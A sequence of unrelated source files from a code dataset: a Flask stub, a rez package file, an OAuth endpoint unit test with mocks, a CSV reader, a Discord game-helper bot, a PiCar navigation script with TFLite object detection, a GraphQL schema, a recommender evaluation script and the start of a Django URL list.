__name__ == \"__main__\":\n app.run(debug=True)\n","sub_path":"tfrs-flutter/step3/backend/recommender.py","file_name":"recommender.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"628226573","text":"name = \"eigen\"\n\nversion = \"3.3.7\"\n\nauthors = [\n \"eigenteam\"\n]\n\ndescription = \\\n \"\"\"\n Eigen is a C++ template library for linear algebra: matrices, vectors, numerical solvers, and related algorithms.\n \"\"\"\n\nprivate_build_requires = [\n \"gcc-4.8+<5\",\n]\n\nvariants = [\n [\"platform-linux\", \"arch-x86_64\", \"os-CentOS-7\"]\n]\n\nuuid = \"5d9a247d-7900-4830-a142-60ce1f730b98\"\n\ndef commands():\n if building:\n env.CMAKE_MODULE_PATH.append('{this.root}/share/eigen3/cmake')\n env.PKG_CONFIG_PATH.append('{this.root}/share/pkgconfig')\n","sub_path":"eigen/3.3.7/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"573439637","text":"import unittest\nfrom unittest.mock import patch\nfrom server import app\nimport json\nfrom bson.objectid import ObjectId\n\nfrom resource.model.User import UserModel\n\n\nclass CredentialsMock():\n def __init__(self):\n pass\n\n @property\n def token(self):\n return 'Credentials.token'\n\n @property\n def refresh_token(self):\n return 'Credentials.refresh_token'\n\n @property\n def token_uri(self):\n return 'Credentials.token_uri'\n\n @property\n def client_id(self):\n return 'Credentials.client_id'\n\n @property\n def client_secret(self):\n return 'Credentials.client_secret'\n\n @property\n def scopes(self):\n return 'Credentials.scopes'\n\n\nclass FlowMock():\n def __init__(self):\n self._redirect_uri = None\n self.test = 'test'\n\n @property\n def redirect_uri(self):\n return self._redirect_uri\n\n @redirect_uri.setter\n def redirect_uri(self, uri):\n self._redirect_uri = uri\n\n def fetch_token(self, **kwargs):\n self.credentials = CredentialsMock()\n\n\nclass TestGoogleCredentials(unittest.TestCase):\n api_url = '/api/google/credentials'\n\n def setUp(self):\n app.config['TESTING'] = True\n self.app = app.test_client()\n\n def test_post_when_parameters_isnt_set(self):\n data = self.app.post(TestGoogleCredentials.api_url)\n self.assertEqual(data.status_code, 400)\n\n data = self.app.post(TestGoogleCredentials.api_url, data={\n 'callback_url': 'aaa'\n })\n self.assertEqual(data.status_code, 400)\n\n data = self.app.post(TestGoogleCredentials.api_url, data={\n 'state': 'bbb'\n })\n self.assertEqual(data.status_code, 400)\n\n def test_post_when_invalid_parameter(self):\n data = self.app.post(TestGoogleCredentials.api_url, data={\n 'callback_url': 'http://localhost:5000/',\n 'state': 'bbb'\n })\n self.assertEqual(data.status_code, 400)\n\n data = self.app.post(TestGoogleCredentials.api_url, data={\n 'callback_url': 'https://localhost:5000/',\n 'state': 'bbb'\n })\n self.assertEqual(data.status_code, 400)\n\n @patch('google_auth_oauthlib.flow.Flow.from_client_config')\n @patch('resource.api.google.credentials.get_userinfo_from_google')\n def test_post_success(self, mock_get_userinfo, mock_flow):\n mock_flow.return_value = FlowMock()\n mock_get_userinfo.return_value = {\n 'email': 'test@gmail.com',\n 'id': '1000'\n }\n\n data = self.app.post(TestGoogleCredentials.api_url, data={\n 'callback_url': 'https://localhost:5000/success_using_mock',\n 'state': 'bbb'\n })\n\n self.assertEqual(data.status_code, 200)\n\n dict_data = json.loads(data.get_data())\n objectid = ObjectId(dict_data['objectid'])\n user = UserModel()\n user_data = user.getUser(objectid)\n\n correct_keys = [\n '_id', 'token', 'refresh_token', 'token_uri',\n 'client_id', 'client_secret', 'scopes', 'email', 'id'\n ]\n\n for index, value in enumerate(user_data):\n data = user_data[value]\n self.assertTrue(value in correct_keys)\n\n if type(data) is ObjectId:\n data = str(data)\n\n self.assertGreater(len(data), 0)\n","sub_path":"app/tests/api/google/test_credentials.py","file_name":"test_credentials.py","file_ext":"py","file_size_in_byte":3358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"328019727","text":"import os\nimport pandas as pd\nimport os\nimport numpy as np\n\nclass CSV():\n def __init__(self, path, name):\n self.name = name\n self.path = path\n self.csv = pd.read_csv(self.path)\n\nclass CSVsProcessor():\n def __init__(self, path):\n self.pages = {}\n self.input_data = path\n self.csvs=[]\n self.data_dir = path\n for file in os.listdir(self.data_dir):\n if file.endswith(\".csv\"):\n self.csvs.append(CSV(os.path.join(self.data_dir, file), file[:-4]))\n\n def processCSVFiles(self):\n for csv in self.csvs:\n pages_list =[]\n for index, row in csv.csv.iterrows():\n pages_list.append(row['URLs_to_scrap'])\n self.pages[csv.name] = pages_list\n\n def processURLsToGroupNames(self):\n for key in self.pages:\n for index in range(len(self.pages[key])):\n self.pages[key][index]=self.pages[key][index].replace(\"https://www.facebook.com/\", \"\")[:-1]\n\n def process(self):\n \"\"\"Makes dict with file name as a key(genre) and list with pages names as values for all\n .csv files storaged in self.data_dir path\"\"\"\n self.processCSVFiles()\n self.processURLsToGroupNames()\n\n def dumpData(self):\n return self.pages\n","sub_path":"PplOpinion/UtillsAndSettings/CSVReader.py","file_name":"CSVReader.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"252815359","text":"import datetime\n\nfrom modules.base import BaseClass\nfrom modules.deeptown.api import Api\nfrom modules.deeptown.optimizer import Optimizer\n\nitem_type_priority = {\n \"quest\": 00,\n \"crafted\": 50,\n \"chemical\": 60,\n 'organic': 70,\n \"raw\": 100,\n}\n\nOR = \"5923174042d9bb579ca0ed55\"\nARGENT = \"5953ed2369ce4943b24c40a5\"\nFER = \"596ec7259e64a9589c0621d3\"\nCOOKIES = \"59b3ae22575c777d1dfcd87b\"\n\nguilds = {\n \"or\": OR,\n \"ors\": OR,\n \"argent\": ARGENT,\n \"argents\": ARGENT,\n \"fer\": FER,\n \"fers\": FER,\n \"cookie\": COOKIES,\n \"cookies\": COOKIES\n}\n\n\nclass MainClass(BaseClass):\n name = \"deeptown\"\n command_text = \"deeptown\"\n help = {\n \"description\": \"Commandes relatives à deeptown\",\n \"commands\": {\n \"`{prefix}{command} to_make [=1]`\": \"Affiche les ressources nécessaire pour faire l'item \"\n \" fois.\",\n \"`{prefix}{command} to_make_recursive [=1]`\": \"Affiche toutes les ressources nécessaires pour \"\n \"faire fois l'objet de manière \"\n \"récursive.\",\n \"`{prefix}{command} best_place_mine `\": \"Affiche les 10 meilleurs emplacements pour le minerais \"\n \".\",\n # \"`{prefix}{command} reload_data`\": \"Recharge les données à partir du site deeptownguide.com\",\n \"`{prefix}{command} leaderboard `\": \"Affiche le classement des joueurs dans la guilde \"\n \" (or, argent, fer, cookies uniquement, \"\n \"données mise à jour toutes les 5 minutes)\"\n }\n }\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.optimizer = Optimizer()\n self.api = Api()\n\n async def com_leaderboard(self, message, args, kwargs):\n if len(args) == 1:\n await message.channel.send(\"Vous devez spécifier la guilde (or, argent, fer, cookie).\")\n return\n elif args[1] not in guilds.keys():\n await message.channel.send(\"La guilde doit être or, argent, fer ou cookie\")\n return\n guild_id = guilds[args[1]]\n guild = await self.api.get_guild(guild_id)\n await guild.get_data()\n guild.members.sort(key=lambda x: -x.last_event_donation)\n text = f\"Voici le classement de la guilde {guild.name}:\\n\"\n lines = []\n max_username = max([len(member.username) for member in guild.members])\n for member in guild.members:\n lines.append(f\"{member.username.ljust(max_username)} - {member.last_event_donation} / {member.last_online}\"\n f\" / {member.level} / {member.depth}\\n\")\n await message.channel.send(text)\n while len(lines) >= 10:\n text = \"```\"\n text += \"\".join(lines[:10])\n for i in range(min(10, len(lines))): lines.pop(0)\n text += \"```\"\n await message.channel.send(text)\n\n async def com_best_place_mine(self, message, args, kwargs):\n if len(args) == 1:\n await message.channel.send(\"Il faut spécifier au moins un minerais.\")\n return\n if args[1] not in self.optimizer.mines[\"0\"].keys():\n await message.channel.send(f\"Le minerais {args[1]} n'existe pas\")\n return\n text = f\"Voici les 10 meilleurs emplacements pour le minerais {args[1]}:```\"\n i = 0\n for mine in self.optimizer.best_mines(args[1]):\n if i >= 10:\n break\n if mine[0] == \"0\":\n continue\n text += mine[0].center(3, \" \")\n text += \": \"\n text += str(mine[1][args[1]] * 100)\n text += \"%\\n\"\n i += 1\n text += \"```\"\n await message.channel.send(text)\n return\n\n async def com_to_make(self, message, args, kwargs):\n if len(args) == 1:\n await message.channel.send(\"Il faut au moins spécifier le nom de l'objet.\")\n return\n if len(args) == 2:\n args.append(\"1\")\n if args[1] not in self.optimizer.items.keys():\n await message.channel.send(f\"L'objet {args[1]} n'est pas un objet valide\")\n return\n try:\n quantity = int(args[2])\n except ValueError:\n await message.channel.send(f\"La quantité {args[2]} n'est pas un entier.\")\n return\n result = self.optimizer.to_make(args[1], quantity)\n time = datetime.timedelta(seconds=int(result[\"time\"]))\n needed = \", \".join([str(quantity) + \" \" + name for name, quantity in result[\"needed\"].items()])\n await message.channel.send(f\"Pour faire {quantity} {args[1]} il faudra {time}. Il vous faudra {needed}. La \"\n f\"valeur totale de la production est de {result['value']}.s\")\n\n async def com_to_make_recursive(self, message, args, kwargs):\n if len(args) == 1:\n await message.channel.send(\"Vous devez spécifier au moins le nom de l'objet.\")\n return\n if len(args) == 2:\n args.append(\"1\")\n if args[1] not in self.optimizer.items.keys():\n await message.channel.send(f\"L'objet {args[1]} n'existe pas.\")\n return\n try:\n quantity = int(args[2])\n except ValueError:\n await message.channel.send(f\"La quantité {args[2]} n'est pas valide.\")\n return\n needed = self.optimizer.recursive_to_make(args[1], quantity)\n texte = f\"Pour faire {quantity} de {args[1]} vous aurez besoin de:```\"\n needed.sort(key=lambda x: item_type_priority[x[0]])\n for item in needed[1:]:\n texte += \"\\n\"\n texte += \"{item:20} | {quantity:8} | {time}\".format(item=item[1],\n quantity=item[2],\n time=datetime.timedelta(seconds=int(item[3])))\n texte += \"```\"\n await message.channel.send(texte)\n","sub_path":"modules/deeptown/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"346851119","text":"#create prime numbers set\ns={2,1,8,7,9,5,6}\nprint(s)\nprime=set()\nnonprime=set()\nfor i in s:\n if(i>1):\n for j in range(2,i):\n if(i%j==0):\n nonprime.add(i)\n break\n else:\n prime.add(i)\nprint(\"prime\",prime)\nprint(\"nonprime\",nonprime)\n\n\n","sub_path":"data collections/prime numbers.py","file_name":"prime numbers.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"571771497","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport io, re, time, heapq, picamera\n\nimport numpy as np\nimport picar_4wd as fc\n\nfrom astar import AStar, MinTurns\nfrom PIL import Image\nfrom tflite_runtime.interpreter import Interpreter\n\nCAMERA_WIDTH = 800\nCAMERA_HEIGHT = 450\nLABEL = \"tflite/coco_labels.txt\"\nMODEL = \"tflite/detect.tflite\"\nTHRES = 0.40\nOBJDT = 0.300\n\nINC = 10\nPOW = 30\nAGL = 0.740\nAGR = 0.710\nFCM = 0.025\n\nSTART = (100,50)\n\ndef main():\n\t\n\ttime.sleep(5)\n\n\tdist = getDist()\n\tmap = getMap(dist)\n\tnp.savetxt(\"maps/map8.csv\", map, fmt='%i', delimiter=\",\")\t\n\n\tgoal = (0,0)\n\tturns, route = getRoute(map, goal)\n\tnp.savetxt(\"maps/route8.csv\", route, fmt='%i', delimiter=\",\")\n\t\n\tnaviCar(turns)\n\t\n\ndef getDist():\n\tdisa = []\n\tfor a in range(-90, 100, INC):\n\t\tdisa.append(fc.get_distance_at(a))\n\t#print(\"DistanceA: \", disa)\n\t\n\tdisb = []\n\tfor b in range(90, -100, -INC):\n\t\tdisb.append(fc.get_distance_at(b))\n\t#print(\"DistanceB: \", disb)\n\t\n\tdist = []\n\tfor c in range(len(disa)):\n\t\tdist.append(min(disa[c],disb[len(disa)-1-c]))\n\tprint(\"Distances: \", dist)\n\t\n\tfc.servo.set_angle(0)\n\t\n\treturn dist\n\n\ndef getMap(dist):\n\tw = 101\n\th = 101\n\tp = 10\n\tb = 0\n\tpdy = p*2 + b + 1\n\tpdx = p*2 + 1\n\t\n\tmap = np.zeros((h,w))\n\tfor i in range(len(dist)):\n\t\tif dist[i] != -2:\n\t\t\t# convert polar to cartesian coordinates\n\t\t\ty=(h-1)-int(round(dist[i]*np.sin((i*INC)*np.pi/180)))\n\t\t\tx=int(w/2)+int(round(dist[i]*np.cos((i*INC)*np.pi/180)))\n\t\t\t#print([dist[i],-90+i*INC,y,x])\n\t\t\t\n\t\t\t# mark coordinates on map\n\t\t\tif 0 <= y < h and 0 <= x < w:\n\t\t\t\tmap[y][x] = 2\n\t\t\t\t\n\t\t\t\t# add padding and mark them\n\t\t\t\tfor m in range(pdy):\n\t\t\t\t\tif (y-p-b)+m < 0 or (y-p-b)+m > h-1:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tfor n in range(pdx):\n\t\t\t\t\t\tif (x-p)+n < 0 or (x-p)+n > w-1:\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\tif map[(y-p-b)+m][(x-p)+n] != 2:\n\t\t\t\t\t\t\tmap[(y-p-b)+m][(x-p)+n] = 1\n\t\n\treturn map\n\n\ndef getRoute(map, goal):\n\t# convert marked map for A* algorithm\n\tmpn = [\"\" for i in range(len(map))]\n\tfor j in range(len(map)):\n\t\tfor i in map[j]:\n\t\t\tmpn[j] += str(int(i))\n\t\n\t# find best route with minimum direction changes\n\tturns = MinTurns(START, goal, mpn).search()\n\tturns.append(goal)\n\tprint(\"Turns: \", turns)\n\t\n\t# create complete route with coordinates\n\tcur = START\n\troute = []\n\tfor t in turns:\n\t\ty = t[0] - cur[0]\n\t\tx = t[1] - cur[1]\n\t\tif y > 0:\n\t\t\tfor j in range(y):\n\t\t\t\troute.append((cur[0]+j,cur[1]))\n\t\tif y < 0:\t\n\t\t\tfor j in range(-y):\n\t\t\t\troute.append((cur[0]-j,cur[1]))\n\t\tif x > 0:\n\t\t\tfor i in range(x):\n\t\t\t\troute.append((cur[0],cur[1]+i))\n\t\tif x < 0:\t\n\t\t\tfor i in range(-x):\n\t\t\t\troute.append((cur[0],cur[1]-i))\n\t\tcur = t\n\t\t\n\troute.append(goal)\n\t#print(\"Route: \", route)\n\t\n\t# mark route coordinates\n\tfor r in route:\n\t\tmap[r[0]][r[1]] = 9\n\t\n\treturn turns, map\n\n\ndef naviCar(turns):\n\t\n\tlabels = load_labels(LABEL)\n\tinterpreter = Interpreter(MODEL, num_threads=3)\n\tinterpreter.allocate_tensors()\n\t_, input_height, input_width, _ = interpreter.get_input_details()[0]['shape']\n\n\tcamera = picamera.PiCamera(\n\t\t\tresolution=(CAMERA_WIDTH, CAMERA_HEIGHT), framerate=90)\n\tcamera.rotation = 180\n\tcamera.video_stabilization = True \n\t\n\tdir = []\n\to = START\n\td = 'F'\n\tid = 0\n\n\tfor t in turns:\n\t\t\n\t\t#print(\"==========>\", t)\n\t\t\n\t\tdy = t[0] - o[0]\n\t\tdx = t[1] - o[1]\n\t\t\n\t\tif dy == 0 and dx > 0:\n\t\t\tdir.append('R')\n\t\t\tif d == 'B' or d == 'F':\n\t\t\t\tfc.turn_right(POW)\n\t\t\t\ttime.sleep(AGR)\n\t\t\td = 'R'\n\t\t\t\n\t\tif dy == 0 and dx < 0:\n\t\t\tdir.append('L')\n\t\t\tif d == 'F' or d == 'F':\t\n\t\t\t\tfc.turn_left(POW)\n\t\t\t\ttime.sleep(AGL)\n\t\t\td = 'L'\n\t\t\t\n\t\tif dy > 0 and dx == 0:\n\t\t\tdir.append('B')\n\t\t\tif d == 'L':\n\t\t\t\tfc.turn_right(POW)\n\t\t\t\ttime.sleep(AGR)\n\t\t\tif d == 'R':\t\n\t\t\t\tfc.turn_left(POW)\n\t\t\t\ttime.sleep(AGL)\n\t\t\td = 'B'\n\t\t\t\n\t\tif dy < 0 and dx == 0:\n\t\t\tdir.append('F')\n\t\t\tif d == 'L':\n\t\t\t\tfc.turn_right(POW)\n\t\t\t\ttime.sleep(AGR)\n\t\t\tif d == 'R':\t\n\t\t\t\tfc.turn_left(POW)\n\t\t\t\ttime.sleep(AGL)\n\t\t\td = 'F'\n\t\t\t\n\t\tfc.stop()\n\t\t\n\t\t# object detect to start\n\t\tid += 1\n\t\ttStart = time.monotonic()\n\t\timage = getImage(input_height, input_width, camera, id)\n\t\tresults = detect_objects(interpreter, image, THRES)\n\t\ttRef = getRespond(results, labels, 0) + (time.monotonic() - tStart)\n\t\t\n\t\ttBuffer = OBJDT\n\t\ttRemain = FCM * abs(dy+dx)\n\t\ttElapsed = 0\n\t\ttDrive = 0\n\t\t\n\t\tprint('Reference Time: %.3f' % tRef)\n\t\tprint('Initial Remained Time: %.3f' % tRemain)\n\t\t\n\t\tfc.forward(POW)\n\t\t\n\t\twhile tRemain - max(tElapsed, tBuffer) > 0:\n\t\t\ttStart = time.monotonic()\n\t\t\timage = getImage(input_height, input_width, camera, 0)\n\t\t\tresults = detect_objects(interpreter, image, THRES)\n\t\t\ttElapsed = (time.monotonic() - tStart) + getRespond(results, labels, 1)\n\t\t\ttDrive += tElapsed\n\t\t\t#tRemain -= max(tElapsed, tBuffer)\n\t\t\ttRemain -= tElapsed\n\t\t\tprint('Loop Elapsed | Remain Time: %.3f | %.3f' % (tElapsed, tRemain))\n\t\t\n\t\ttime.sleep(tRemain)\n\t\tprint('Turn Drive Time: %.3f' % (tDrive+tRemain))\n\t\t\n\t\to = t\n\t\n\tfc.stop()\n\tprint(\"Direction: \", dir)\n\tcamera.close()\n\n\ndef getRespond(results, labels, action):\n\n\ttCheck = time.monotonic()\n\t#tUsed = 0\n\t\n\tstopsign = 0\n\tbicycle = 0\n\t\n\tobjects = []\n\tfor obj in results:\n\t\tobjects.append(labels[obj['class_id']])\n\t\tif labels[obj['class_id']] == 'stop sign':\n\t\t\tstopsign = 1\n\n\t\tif labels[obj['class_id']] == 'bicycle':\n\t\t\tbicycle = 1\n\t\t\n\tif action == 1:\n\t\tif stopsign == 1:\n\t\t\tprint(\"Stop Here!!\")\n\t\t\ttime.sleep(0.1)\n\t\t\tfc.stop()\n\t\t\t#tUsed += time.monotonic() - tCheck \n\t\t\ttime.sleep(2)\n\t\t\ttCheck = time.monotonic()\n\t\t\tfc.forward(POW)\n\t\t\tstopsign = 0\n\t\t\tprint(\"Objects: \", objects)\t\n\t\t\t\n\t\tif bicycle == 1:\n\t\t\tprint(\"Slow Down!!\")\n\t\t\t#tUsed += time.monotonic() - tCheck \n\t\t\ttime.sleep(0.1)\n\t\t\tfc.stop()\n\t\t\ttime.sleep(0.2)\n\t\t\tfc.forward(POW/3)\n\t\t\ttime.sleep(1)\n\t\t\tfc.stop()\n\t\t\ttime.sleep(0.2)\n\t\t\ttCheck = time.monotonic() - 1\n\t\t\tfc.forward(POW)\n\t\t\tbicycle = 0\n\t\t\tprint(\"Objects: \", objects)\t\t\n\t\n\t#tUsed += time.monotonic() - tCheck\n\treturn time.monotonic() - tCheck\n\n\ndef getImage(input_height, input_width, camera, id):\t\n\t\n\tstream = io.BytesIO()\n\t\n\tif id > 0:\n\t\tcamera.capture('imgs/capture%d.jpg' % id, use_video_port=True)\n\t\n\tcamera.capture(stream, format='jpeg', use_video_port=True)\n\t\n\tstream.seek(0)\n\timage = Image.open(stream).convert('RGB').resize(\n\t\t\t(input_width, input_height), Image.ANTIALIAS)\n\t\n\tstream.truncate()\n\t\n\treturn image\n\t\n\ndef load_labels(path):\n\t\"\"\"Loads the labels file. Supports files with or without index numbers.\"\"\"\n\twith open(path, 'r', encoding='utf-8') as f:\n\t\tlines = f.readlines()\n\t\tlabels = {}\n\t\tfor row_number, content in enumerate(lines):\n\t\t\tpair = re.split(r'[:\\s]+', content.strip(), maxsplit=1)\n\t\t\tif len(pair) == 2 and pair[0].strip().isdigit():\n\t\t\t\tlabels[int(pair[0])] = pair[1].strip()\n\t\t\telse:\n\t\t\t\tlabels[row_number] = pair[0].strip()\n\treturn labels\n\n\ndef set_input_tensor(interpreter, image):\n\t\"\"\"Sets the input tensor.\"\"\"\n\ttensor_index = interpreter.get_input_details()[0]['index']\n\tinput_tensor = interpreter.tensor(tensor_index)()[0]\n\tinput_tensor[:, :] = image\n\n\ndef get_output_tensor(interpreter, index):\n\t\"\"\"Returns the output tensor at the given index.\"\"\"\n\toutput_details = interpreter.get_output_details()[index]\n\ttensor = np.squeeze(interpreter.get_tensor(output_details['index']))\n\treturn tensor\n\n\ndef detect_objects(interpreter, image, threshold):\n\t\"\"\"Returns a list of detection results, each a dictionary of object info.\"\"\"\n\tset_input_tensor(interpreter, image)\n\tinterpreter.invoke()\n\n\t# Get all output details\n\tboxes = get_output_tensor(interpreter, 0)\n\tclasses = get_output_tensor(interpreter, 1)\n\tscores = get_output_tensor(interpreter, 2)\n\tcount = int(get_output_tensor(interpreter, 3))\n\n\tresults = []\n\tfor i in range(count):\n\t\tif scores[i] >= threshold:\n\t\t\tresult = {\n\t\t\t\t'bounding_box': boxes[i],\n\t\t\t\t'class_id': classes[i],\n\t\t\t\t'score': scores[i]\n\t\t\t}\n\t\t\tresults.append(result)\n\treturn results\n\t\n\t\nif __name__ == \"__main__\":\n main()\n","sub_path":"picar.py","file_name":"picar.py","file_ext":"py","file_size_in_byte":7763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"562352977","text":"\nimport graphene\nfrom graphene import relay\nfrom graphene_django.types import DjangoObjectType\nfrom graphene_django.filter import DjangoFilterConnectionField\n\nfrom .models import Category, Ingredient, Recipe, Cookbook\n\n\nclass CategoryNode(DjangoObjectType):\n class Meta:\n model = Category\n filter_fields = ['name',]\n interfaces = (relay.Node,)\n\n\nclass IngredientNode(DjangoObjectType):\n class Meta:\n model = Ingredient\n filter_fields = {\n 'name': ['exact', 'contains', 'startswith', 'endswith'],\n 'notes': ['exact', 'contains'],\n 'category': ['exact'],\n 'category__name': ['exact'],\n }\n interfaces = (relay.Node,)\n\n\nclass RecipeNode(DjangoObjectType):\n class Meta:\n model = Recipe\n filter_fields = {\n 'name': ['exact', 'contains', 'startswith', 'endswith'],\n 'author': ['exact'],\n 'author__username': ['exact', 'contains'],\n 'created_at': ['exact', 'gt', 'lt', 'gte', 'lte'],\n 'last_updated': ['exact', 'gt', 'lt', 'gte', 'lte'],\n 'servings': ['exact', 'gt', 'lt', 'gte', 'lte'],\n 'serving_size': ['exact', 'contains'],\n 'prep_time': ['exact', 'gt', 'lt', 'gte', 'lte'],\n 'cook_time': ['exact', 'gt', 'lt', 'gte', 'lte'],\n 'ingredients': ['contains'],\n 'instructions': ['contains'],\n 'fork': ['exact'],\n 'fork__name': ['exact', 'contains', 'startswith', 'endswith'],\n }\n interfaces = (relay.Node,)\n\n\nclass CookbookNode(DjangoObjectType):\n class Meta:\n model = Cookbook\n filter_fields = {\n 'name': ['exact', 'contains', 'startswith', 'endswith'],\n 'author': ['exact'],\n 'author__username': ['exact', 'contains'],\n 'created_at': ['exact', 'gt', 'lt', 'gte', 'lte'],\n 'last_updated': ['exact', 'gt', 'lt', 'gte', 'lte'],\n 'recipes': ['contains'],\n 'description': ['contains'],\n 'fork': ['exact'],\n 'fork__name': ['exact', 'contains', 'startswith', 'endswith'],\n }\n interfaces = (relay.Node,)\n\n\nclass Query(graphene.AbstractType):\n category = relay.Node.Field(CategoryNode)\n categories = DjangoFilterConnectionField(CategoryNode)\n\n ingredient = relay.Node.Field(IngredientNode)\n ingredients = DjangoFilterConnectionField(IngredientNode)\n\n recipe = relay.Node.Field(RecipeNode)\n recipes = DjangoFilterConnectionField(RecipeNode)\n\n cookbook = relay.Node.Field(CookbookNode)\n cookbooks = DjangoFilterConnectionField(CookbookNode)\n","sub_path":"chefql/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"367923973","text":"# -*- coding: utf-8 -*-\r\nfrom __future__ import division\r\nimport numpy as np\r\nimport tensorflow as tf\r\nfrom model import MIR4SR\r\nfrom utils import Data\r\nimport pickle\r\nimport argparse\r\nimport time\r\nimport math\r\n\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument('--dataset', default='yoochoose')\r\nparser.add_argument('--method', type=str, default='sat', help='session encoder method')\r\nparser.add_argument('--model_path', type=str, default='./exp/yoochoose/model/model')\r\nparser.add_argument('--batch_size', type=int, default=512, help='input batch size')\r\nparser.add_argument('--hidden_size', type=int, default=100, help='hidden state size')\r\nparser.add_argument('--emb_size', type=int, default=100, help='hidden state size')\r\nparser.add_argument('--nonhybrid', action='store_true', help='global preference')\r\nparser.add_argument('--kg', type=int, default=1000)\r\nparser.add_argument('--num_head', type=int, default=1)\r\nparser.add_argument('--num_block', type=int, default=1)\r\nparser.add_argument('--num_gcn', type=int, default=1)\r\nopt = parser.parse_args()\r\n\r\ntest_data = pickle.load(open('../datasets/' + opt.dataset + '/test.txt', 'rb'))\r\ntest_data = Data(test_data, sub_graph=True, method=opt.method, shuffle=False)\r\n\r\nif opt.dataset == 'diginetica':\r\n n_node = 43098\r\nelif opt.dataset == 'yoochoose1_64' or opt.dataset == 'yoochoose1_4':\r\n n_node = 37484\r\nelif opt.dataset == 'yoochoose':\r\n n_node = 17377\r\nelif opt.dataset == 'y14':\r\n n_node = 30445\r\nelif opt.dataset == 'lastfm2':\r\n n_node = 40001\r\nelif opt.dataset == 'lastfm':\r\n n_node = 39164\r\nelif opt.dataset == 'retailrocket' or 'rr' in opt.dataset:\r\n n_node = 36969\r\n\r\nmodel = MIR4SR(hidden_size=opt.hidden_size,\r\n emb_size=opt.emb_size,\r\n n_node=n_node,\r\n method=opt.method,\r\n kg=opt.kg,\r\n num_head=opt.num_head,\r\n num_block=opt.num_block,\r\n nonhybrid=opt.nonhybrid,\r\n num_gcn=opt.num_gcn)\r\n\r\nsaver = tf.train.Saver()\r\nsaver.restore(model.sess, opt.model_path)\r\nslices = test_data.generate_batch(opt.batch_size)\r\nprint('start predict:' + time.strftime('%m-%d %H:%M:%S ', time.localtime(time.time())))\r\nhit = {5: [], 10: [], 15: [], 20: [], 30: [], 40: [], 50: [], 60: []}\r\nmrr = {5: [], 10: [], 15: [], 20: [], 30: [], 40: [], 50: [], 60: []}\r\nndcg = {5: [], 10: [], 15: [], 20: [], 30: [], 40: [], 50: [], 60: []}\r\n# fetches = [model.logits, model.rec_loss, model.top_k, model.s_emb, model.sa_att, model.att]\r\nfetches = [model.logits, model.rec_loss, model.top_k]\r\ntest_loss_, ans, sess_emb, atts, sa_atts = [], [], [], [], []\r\nfor i, j in zip(slices, np.arange(len(slices))):\r\n batch_input = test_data.get_slice(i)\r\n # scores, test_loss, tk, s_emb, sa_att, att = model.run_rec(\r\n # fetches, batch_input, is_train=False)\r\n scores, test_loss, tk = model.run_rec(\r\n fetches, batch_input, is_train=False)\r\n test_loss_.append(test_loss)\r\n ans.append(tk)\r\n # sess_emb.append(s_emb)\r\n # sa_atts.append(sa_att)\r\n # atts.append(att)\r\n\r\n targets = batch_input[-1]\r\n for score, target in zip(tk, targets):\r\n for i in [5, 10, 15, 20, 30, 40, 50, 60]:\r\n hit[i].append(np.isin(target - 1, score[:i]))\r\n if len(np.where(score[:i] == target - 1)[0]) == 0:\r\n mrr[i].append(0)\r\n ndcg[i].append(0)\r\n else:\r\n rank = 1 + np.where(score[:i] == target - 1)[0][0]\r\n mrr[i].append(1 / rank)\r\n ndcg[i].append(1 / math.log(rank + 1, 2))\r\n\r\nprint('test sample %d' % len(hit[20]))\r\nfor i in [5, 10, 15, 20, 30, 40, 50, 60]:\r\n hit[i] = np.mean(hit[i]) * 100\r\n mrr[i] = np.mean(mrr[i]) * 100\r\n ndcg[i] = np.mean(ndcg[i]) * 100\r\n\r\ntest_loss = np.mean(test_loss_)\r\nprint('test_loss: %.4f' % (test_loss))\r\nprint('Recall@5: %.4f, MMR@5: %.4f, NDCG@5: %.4f' % (hit[5], mrr[5], ndcg[5]))\r\nprint('Recall@10: %.4f, MMR@10: %.4f, NDCG@10: %.4f' % (hit[10], mrr[10], ndcg[10]))\r\nprint('Recall@15: %.4f, MMR@15: %.4f, NDCG@15: %.4f' % (hit[15], mrr[15], ndcg[15]))\r\nprint('Recall@20: %.4f, MMR@20: %.4f, NDCG@20: %.4f' % (hit[20], mrr[20], ndcg[20]))\r\nprint('Recall@30: %.4f, MMR@30: %.4f, NDCG@30: %.4f' % (hit[30], mrr[30], ndcg[30]))\r\nprint('Recall@40: %.4f, MMR@40: %.4f, NDCG@40: %.4f' % (hit[40], mrr[40], ndcg[40]))\r\nprint('Recall@50: %.4f, MMR@50: %.4f, NDCG@50: %.4f' % (hit[50], mrr[50], ndcg[50]))\r\nprint('Recall@60: %.4f, MMR@60: %.4f, NDCG@60: %.4f' % (hit[60], mrr[60], ndcg[60]))\r\n","sub_path":"MTD/load_test.py","file_name":"load_test.py","file_ext":"py","file_size_in_byte":4531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"455615940","text":"from django.conf.urls import include, url\nfrom django.conf import settings\nfrom travelondesk import views\n\nurlpatterns = [url(r'^$', views.index, name='index'),\n url(r'^demandTickets/$', views.demandListView, name='demandTickets'),\n url(r'^serviceTickets/$', views.serviceListView, name='serviceTickets'),\n 